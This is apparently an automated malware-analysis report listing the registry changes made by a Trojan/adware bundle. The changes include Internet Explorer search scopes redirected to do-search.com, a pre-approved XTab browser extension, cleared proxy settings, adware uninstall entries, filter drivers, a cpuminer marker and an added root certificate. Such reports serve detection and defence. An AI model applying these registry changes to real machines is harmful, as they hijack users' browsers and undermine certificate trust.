[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 43 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process powershell.exe:3772 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\MuiCache\2C\52C64B7E]
"LanguageList" = "en-US, en"

The process powershell.exe:3656 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\MuiCache\2C\52C64B7E]
"LanguageList" = "en-US, en"

The process powershell.exe:3376 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\MuiCache\2C\52C64B7E]
"LanguageList" = "en-US, en"

The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_am2.exe:3564 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cp.exe:3480 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "EA F1 08 62 9A 83 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "8A 92 33 64 9A 83 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"

[HKCU\Software\InstallPath\Status]
"cpuminer" = "S"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 47 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files% (x86)\Google\Update\1.3.25.11, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\nsProcess.dll, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\registry.dll,"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following registry key(s):

[HKCU\Software\InternetTurbo]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process XTab_Setup2253.exe:1748 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0\HELPDIR]
"(Default)" = "%Program Files% (x86)\XTab"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}" = "1"

[HKLM\SOFTWARE\Wow6432Node\supTab]
"ptid" = "pcm"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"TopResultURL" = "http://www.bing.com/search?q={searchTerms}&src=IE-TopResult&FORM=IETR02"
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 4B 00 00 00 09 00 00 00 00 00 00 00"

[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0]
"(Default)" = "SupTabLib"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconURL" = "http://www.bing.com/favicon.ico"

[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0\0\win32]
"(Default)" = "%Program Files% (x86)\XTab\SupTab.dll"

[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}]
"(Default)" = "IETabPage Class"

[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\TypeLib]
"(Default)" = "{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}"

[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\InprocServer32]
"(Default)" = "%Program Files% (x86)\XTab\SupTab.dll"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"

[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}]
"(Default)" = "IIETabPage"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Ext\PreApproved]
"{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}" = ""

[HKCR\Wow6432Node\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"Version" = "1.0"

[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\Version]
"(Default)" = "1.0"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconPath" = "C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico"
"DisplayName" = "Bing"

[HKCR\Wow6432Node\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"(Default)" = "{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"FaviconURL" = "http://www.google.com/favicon.ico"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}"

[HKLM\SOFTWARE\Wow6432Node\SupDp]
"dir" = "%Program Files% (x86)\XTab"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"FaviconURL" = "http://do-search.com//favicon.ico"

[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"(Default)" = "{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}"

[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"NewTabPageShow" = "0"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"

[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Wow6432Node\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}]
"(Default)" = "IIETabPage"

[HKCR\Wow6432Node\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"Version" = "1.0"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"FaviconPath" = "C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}.ico"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"TopResultURL" = "http://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"TopResultURL" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY]
"CheckedValue" = "PMIL"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconURLFallback" = "http://www.bing.com/favicon.ico"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"DisplayName" = "Google"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"DisplayName" = "e"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY]
"DefaultValue" = "PMIL"

[HKCR\Wow6432Node\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"FaviconPath" = "C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{E733165D-CBCF-4FDA-883E-ADEF965B476C}.ico"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
"AutoDetect"

The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_a9.exe:3400 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "EA F1 08 62 9A 83 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "1D EF BE 63 9A 83 D0 01"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files% (x86)\Google\Update\1.3.25.11, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp,"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 46 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process amisid.exe:3516 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\InternetTurbo]
"UID" = "915A4028688142931B5DDA64A4540CAD"

The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_gs.exe:4024 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\GOSafer]
"QuietUninstallString" = "%Program Files% (x86)\GOSafer\uninst.exe"
"Comments" = "Your custom offers and deals!(xBLWr3p4Aq2S5TKPAPwXoUXvWB)"

[HKLM\SOFTWARE\GOSafer]
"Version" = "1.0.0"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\GOSafer]
"DisplayVersion" = "1.0"
"Publisher" = "GO SAFER LLC"
"UninstallString" = "%Program Files% (x86)\GOSafer\uninst.exe"
"DisplayName" = "GOSafer"

The process nfregdrv.exe:3076 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "0B 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"

The process nfregdrv.exe:1648 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "0A 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"

The process CashReminder.exe:1108 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 04 00 00 00 09 00 00 00 00 00 00 00"
"DefaultConnectionSettings" = "46 00 00 00 04 00 00 00 09 00 00 00 00 00 00 00"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "1E 4E AA 68 9A 83 D0 01"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"

[HKLM\System\CurrentControlSet\Services\crfilterdrv]
"Tag" = "15"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "0E 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\System\CurrentControlSet\Services\Tcpip6\Parameters]
"DisabledComponents" = "142"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\CashReminder]
"instid" = "Oe7hZG4iL2THGzzgTyPL5m0uORXCQUea"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "1E 4E AA 68 9A 83 D0 01"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoDetect"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cr.exe:1520 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\CashReminder]
"Version" = "1.0.0"
"affid" = ""

[HKLM\System\CurrentControlSet\Services\CashReminder]
"Description" = "CashReminder will remind you when you can earn a percent of your money back shopping online and related products with lower prices!"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\CashReminder]
"DisplayName" = "CashReminder"
"Publisher" = "Related Deals LLC"
"UninstallString" = "%Program Files% (x86)\CashReminder\uninstall.exe /S"
"Comments" = "CashReminder will remind you when you can earn a percent of your money back shopping online and related products with lower prices! (Build: EZbBN9f90YpDduoIMPstB7W)"

[HKLM\SOFTWARE\Wow6432Node\CashReminder]
"Version" = "1.0.0"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\CashReminder]
"DisplayVersion" = "1.0.0"
"QuietUninstallString" = "%Program Files% (x86)\CashReminder\uninstall.exe /S"

The process ActSys.exe:3756 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 07 00 00 00 09 00 00 00 00 00 00 00"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "22 FE 3B 6A 9A 83 D0 01"

[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\System\CurrentControlSet\Services\asfilterdrv]
"Tag" = "19"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\527254500A2C2998BD4D09D9989A7F3E76405E07]
"Blob" = "03 00 00 00 01 00 00 00 14 00 00 00 52 72 54 50"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "12 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\System\CurrentControlSet\Services\Tcpip6\Parameters]
"DisabledComponents" = "142"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionTime" = "BE 7F E7 6B 9A 83 D0 01"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 06 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\ActSys]
"instid" = "RB2FatLSVuE3rC0Sz2xcEzbzGA6K2yY0"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates]
"527254500A2C2998BD4D09D9989A7F3E76405E07"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoDetect"

